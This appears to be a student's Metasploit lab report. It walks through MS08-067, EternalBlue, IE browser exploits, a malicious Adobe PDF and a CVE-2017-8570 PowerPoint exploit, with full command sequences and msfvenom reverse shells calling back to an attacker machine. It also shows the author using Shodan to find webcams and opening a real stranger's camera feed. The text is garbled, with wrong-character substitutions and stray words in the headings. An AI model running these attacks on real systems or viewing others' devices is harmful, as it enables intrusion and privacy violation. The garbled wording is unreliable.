2018-2019-2 20165330《網絡對抗技術》Exp5 MSF基礎應用

目錄


實驗目的

  • 本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路

返回目錄html


實驗內容

返回目錄python


基礎問題

  • 用本身的話解釋什麼是exploitpayloadencodelinux

    • exploit:利用漏洞,達到攻擊控制受害機的一種手段
    • payload:載荷,含有執行攻擊的代碼,來實現任何運行在受害者環境中的程序所能作的事情
    • encode:對攻擊代碼進行假裝,使其能正常運行並儘可能免殺

返回目錄git


相關知識

關於MSFgithub

  • 主要模塊:滲透攻擊模塊(Exploit Modules)輔助模塊(Auxiliary Modules)攻擊載荷(Payload Modules)空字段模塊(Nop Modules)編碼模塊(Encoders)後滲透攻擊模塊(Post)
    • 查看模塊源碼的目錄:/usr/share/metasploit-framework/modules
    • 進入某個模塊可經過info查看其信息,觀察其要設置的信息(帶yes的爲須要設置的,如有默認值則不用 設)、能夠攻擊的靶機(target)
      image
  • 三個用戶操做界面
    • msfconsole:msfconsole
    • Armitage
      • 啓動:web

        service postgresql start
        armitage
      • 在kali中就是下面的妹紙,也可點擊圖標啓動
        image
      • 隨後配置端口
      • 使用:點擊connectyes
        image
      • 界面以下
        image
    • Web GUI
  • 攻擊方式
    • 主動攻擊
      • 搜索漏洞:search cve:2018 type:exploit platform:windows(cve後爲漏洞年份)
      • 也能夠:help search查看命令格式
        image
    • 攻擊瀏覽器,獲取系統控制權sql

      use exploit/windows/browser/ie_setmousecapture_uaf
       info 
       設置參數 payload options
       exploit
       上鉤後
       use auxiliray/server/browser_autopwn
    • 攻擊客戶端應用,獲取系統控制權
      • 攻擊Adobe Readershell

        use exploit/windows/fileformat/adobe_cooltype_sing 
        info
        search type:exploit  name:Excel platform:windows

返回目錄windows


實驗步驟

一個主動攻擊實踐

ms08_067

攻擊方:kali10.0.0.217 靶機:Win2kServer_SP0_target10.0.0.112api

ms08_067_netapi是一款Metasploit中有點老的溢出攻擊載荷,攻擊者利用受害者主機默認開放的SMB服務端口445,發送惡意資料到這個端口,經過MSRPC接口調用server服務的一個函數,並破壞程序的棧緩存區,得到遠程代碼執行權限,從而徹底控制主機。

  • 咱們首先可使用Armitage根據網段搜索出靶機:Hosts-Nmap Scan-Quick Scan(OS detect)(能夠自動探測目標主機的操做系統)
    image
  • 找到咱們的靶機
    image
  • 對靶機右鍵選擇Services,查看靶機上開啓的服務,有以下服務:
    image
  • 對靶機右鍵選擇Scan(Armitage會調用Metasploit的漏洞掃描模塊,定向掃描靶機,尋找存在的漏洞,爲下一步肯定攻擊方法提供參考依據)
    image
  • 菜單欄中點擊Attacks-Find Attacks,Armitage會自動尋找合適的攻擊模塊,結束會出現下圖
    image
  • 此時咱們先對靶機右鍵選擇Attack-smb-check exploits檢測哪些漏洞是存在的
    image
  • 這是能夠選擇Attack-smb-ms08_067_netapi自動攻擊,設置端口爲5330,標記Use a reverse connection,點擊Launch
    image
  • 發現失敗。。(注意這裏自動攻擊會有默認的payload)
    image
  • 下面咱們進入console手動換一種payload

    use exploit/windows/smb/ms08_067_netapi //選擇攻擊模塊
    set payload generic/shell_reverse_tcp //選擇攻擊載荷
    show options //查看配置信息
    show targets //查看可攻擊的平臺
    set RHOST 10.0.0.112 //設置靶機IP,端口默認爲445
    set LPORT 5330 //成功後回連主機端口5330
    set LHOST 10.0.0.217 //設置攻方IP
    set target 1 //這裏爲win2k(可經過「show targets」查看可攻擊的平臺)
    exploit //發起滲透攻擊
  • 攻擊成功!
    image
  • 對靶機右鍵選擇shell 1- interact,先輸入run在輸入dir查看目錄信息
    image
  • 使用msfconsole效果以下
    image

ms17_010永恆之藍

攻擊方:kali 10.0.0.138 靶機:Windows7 x64 10.0.0.216

永恆之藍漏洞是方程式組織在其漏洞利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞致使攻擊者在目標系統上能夠執行任意代碼。(SMB服務的做用:該服務在Windows與UNIX系列OS之間搭起一座橋樑,讓二者的資源可互通有無。)

  • 進入msfconsole經過search MS17_010 platform:windows查看其可用模塊,咱們選擇第一個exploit/windows/smb/ms17_010_eternalblue
    image
  • 輸入如下命令

    use exploit/windows/smb/ms17_010_eternalblue //選擇攻擊模塊
    show payloads //顯示可用攻擊載荷
    set payload windows/x64/meterpreter/reverse_tcp //設置tcp反向鏈接
    info //查看須要配置的信息及可攻擊的target
    set RHOST 10.0.0.216 //設置靶機IP
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //設置攻擊端口
    set target 0 //設置win7靶機
    exploit //發起滲透攻擊
  • 攻擊成功
    image
  • 查看IP驗證在繼續後面的命令操做
    image


一個針對瀏覽器的攻擊

ms11_050

攻擊方:kali 10.0.0.138 靶機:Windows7 x64 10.0.0.216 瀏覽器:IE 8.0

  • kali中輸入msfconsole進入控制檯,依次輸入如下指令

    use windows/browser/ms11_050_mshtml_cobjectelement //選擇攻擊模塊
    set payload windows/meterpreter/reverse_http //設置http反向鏈接
    set SRVHOST 10.0.0.138 //設置靶機要回連的IP地址
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //設置攻擊端口
    set URIPATH 20165330zyx //統一資源標識符路徑設置
    exploit //發起滲透攻擊
  • 在瀏覽器輸入http://10.0.0.138:8080/20165330zyx,IE出現警告彈窗,提示關閉程序
    image
  • 來看msfconsole這邊,沒啥反應
    image
  • 參考學姐博客,在IE中點擊工具-Internet選項,修改以下安全設置
    image
    image
  • 在進到地址,這回提示運行不正常的加載項或惡意加載項致使 Internet Explorer 關閉此網頁
    image

ms14_064

攻擊方:kali 10.0.0.138 靶機:WindowsXP 10.0.0.171 瀏覽器:IE 8.0

此安全更新可解決 Microsoft Windows 對象連接與嵌入 (OLE) 中 2 個私下報告的漏洞。最嚴重的漏洞可能在用戶使用 Internet Explorer 查看經特殊設計的網頁時容許遠程執行代碼。成功利用這些漏洞的攻擊者能夠在當前用戶的上下文中運行任意代碼。若是當前用戶使用管理用戶權限登陸,則攻擊者可隨後安裝程序;查看、更改或刪除數據;或者建立擁有徹底用戶權限的新賬戶。遠程攻擊者利用此漏洞經過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本。

  • 進入msfconsole經過search ms14_064 platform:windows查看可選攻擊模塊,這裏選用exploit/windows/browser/ms14_064_ole_code_execution
    image
  • 執行如下命令

    use exploit/windows/browser/ms14_064_ole_code_execution //選擇攻擊模塊
    show payloads //顯示可用攻擊載荷
    set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接
    info //查看詳細信息(發現可攻擊winXP和win7)
    set SRVHOST 10.0.0.138 //設置攻方IP
    set AllowPowerShellPrompt true //由於msf中自帶的漏洞利用exp調用的是 powershell。 因此msf中的exp代碼只對安裝powershell的系統生效
    set LHOST 10.0.0.138
    set LPORT 5330
    set target 0 //設置winXP靶機
    exploit //發起滲透攻擊
  • 將生成的URL地址在winXP的IE中打開,發現成功創建了兩個會話
    image
  • 此時能夠用ctrl+c退出當前狀態,經過輸入sessions -i 1獲取第一個會話鏈接,並輸入ipconfig驗證是否爲靶機地址
    image


一個針對客戶端的攻擊

Adobe

攻擊方:kali 10.0.0.138 靶機:WindowsXP 10.0.0.171 Adobe Reader:9.3.0

  • kali輸入msfconsole進入控制檯,依次輸入如下命令

    use windows/fileformat/adobe_cooltype_sing //選擇攻擊模塊
    set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //設置攻擊端口
    set FILENAME 5330.pdf //設置生成的pdf文件名
    exploit //發起攻擊
    此時生成5330.pdf,咱們進入保存目錄cd /root/.msf4/local,輸入cp 5330.pdf /mnt/hgfs/vm複製到共享文件夾中,在移到windowsXP虛擬機中
    image
  • 控制檯中輸入back退出當前模塊,輸入如下命令進入監聽模塊:

    use exploit/multi/handler //進入監聽模塊
    set payload windows/meterpreter/reverse_tcp //設置tcp反向鏈接
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //設置攻擊端口
    exploit //監聽
  • 靶機中打開pdf文件
    image
  • kali中發現回連成功,輸入ipconfig確認是否會連正確
    image
  • 發現無誤,就能夠繼續後續的命令操做了

CVE-2017-8570

攻擊方:kali 10.0.0.138 靶機:WindowsXP 10.0.0.216 Microsoft Office:2016 (64-bit edition)

  • 2017年7月,微軟在例行的月度補丁中修復了多個Microsoft Office漏洞,其中的CVE-2017-8570漏洞爲一個邏輯漏洞,利用方法簡單。網上已經出現該漏洞的利用代碼,影響範圍較廣。
  • 該漏洞爲Microsoft Office的一個遠程代碼執行漏洞。其成因是Microsoft PowerPoint執行時會初始化Script」Moniker對象,而在PowerPoint播放動畫期間會激活該對象,從而執行sct腳本(Windows Script Component)文件。攻擊者能夠欺騙用戶運行含有該漏洞的PPT文件,致使獲取和當前登陸用戶相同的代碼執行權限。
  • 下載Exploit toolkit CVE-2017-8570
  • 解壓文件後進入該目錄,生成惡意PPSX文件:python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://10.0.0.138/logo.doc(IP爲攻方IP)
    image
    PS:用的時候會報錯No such file or directory: 'template/template.ppsx',只要在裏面建立文件夾template,將template.ppsx挪到template裏便可成功。
  • 生成反彈shell的exe文件:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.138 LPORT=5330 -f exe > shell.exe(由於個人win7爲64位命令中須要加入x64,IP爲攻方IP)
  • 監聽來自ppsx執行反彈shell:python cve-2017-8570_toolkit.py -M exp -e http://10.0.0.138/shell.exe -l shell.exe
    image
  • 進入msfconsole監聽

    use exploit/multi/handler
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    set LHOST 10.0.0.138
    set LPORT 5330
    exploit
  • 將生成的Invoice.ppsx傳至安裝有Microsoft Office 2016的win7上,並打開該文件
    image
  • 發現回連成功
    image


成功應用任何一個輔助模塊

  • msfconsole中可經過命令show auxiliary查看全部的輔助模塊
  • 這裏我選用了gather/shodan_search,使用shodan來搜索網絡攝像頭
  • 關於shodan
    • Shodan是互聯網上最可怕的搜索引擎。
    • 與谷歌不一樣的是,Shodan不是在網上搜索網址,而是直接進入互聯網的背後通道。Shodan能夠說是一款「黑暗」谷歌,一刻不停的在尋找着全部和互聯網關聯的服務器、攝像頭、打印機、路由器等等。每月Shodan都會在大約5億個服務器上日夜不停地蒐集信息。
    • Shodan所蒐集到的信息是極其驚人的。凡是連接到互聯網的紅綠燈、安全攝像頭、家庭自動化設備以及加熱系統等等都會被輕易的搜索到。其真正值得注意的能力就是能找到幾乎全部和互聯網相關聯的東西。而Shodan真正的可怕之處就是這些設備幾乎都沒有安裝安全防護措施,其能夠隨意進入
    • 更詳細的介紹可參考這裏
  • 下面咱們開始按如下步驟運用
    • 進入shodan_search模塊:use auxiliary/gather/shodan_search
    • 查看須要設置的信息有哪些:show options
      image
      發現咱們須要設置APIKEY和QUERY,另外顯示yes的兩個都有默認值不用設置。
    • 先去shodan官網註冊帳號,登錄查看帳戶API後設置APIKEY:set SHODAN_APIKEY tPZf7UpklnPZ*********JFz567WYbt
    • 設置查詢網絡攝像頭的語句:set QUERY "webcamXP"
    • 執行:run
  • 而後看到結果(下圖爲部分結果)
    image
    在結尾處會有[*] Auxiliary module execution completed顯示
  • 如今咱們隨便選一個IP:Port,複製到瀏覽器中看看可不能夠看到畫面(選了一個Slovenia斯洛文尼亞共和國地方的。。。總以爲有點恐怖。。)
    image

返回目錄


離實戰還缺些什麼技術或步驟?

  • 目前咱們對某個漏洞的攻擊仍是針對與網上搜索的資料和步驟,使用的也是很通用的攻擊手段,可是攻擊平臺其實衆多,咱們的靈活性還不夠高,而且攻擊的對象大部分也比較單一,對更高系統的攻擊的實現仍是須要去開發的。

實驗總結與體會

  • 這次實驗是開始實戰的很眇小的一部分,卻足以讓我花費不少心力,從搜尋攻擊模塊到找到看得懂的payload,在尋找靶機,攻擊步驟很明確,攻擊過程卻略顯心酸,好在最後大部分仍是都成功了,我對MSF的掌握也更深了一步,也使得個人實踐能力更高了一層~

參考資料

相關文章
相關標籤/搜索